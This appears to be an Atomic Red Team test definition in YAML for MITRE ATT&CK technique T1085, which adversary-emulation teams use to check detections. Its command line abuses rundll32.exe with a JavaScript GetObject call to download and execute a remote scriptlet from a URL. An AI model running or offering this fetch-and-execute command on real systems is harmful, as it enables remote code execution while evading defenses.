Carrie Roberts
1bfefdacfc
* provide elevation_required attribute * provide elevation_required attribute * provide elevation_required attribute
20 lines
645 B
YAML
20 lines
645 B
YAML
---
|
|
attack_technique: T1085
|
|
display_name: Rundll32
|
|
atomic_tests:
|
|
- name: Rundll32 execute JavaScript Remote Payload With GetObject
|
|
description: |
|
|
Test execution of a remote script using rundll32.exe
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
file_url:
|
|
description: location of the payload
|
|
type: Url
|
|
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: false
|
|
command: |
|
|
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"
|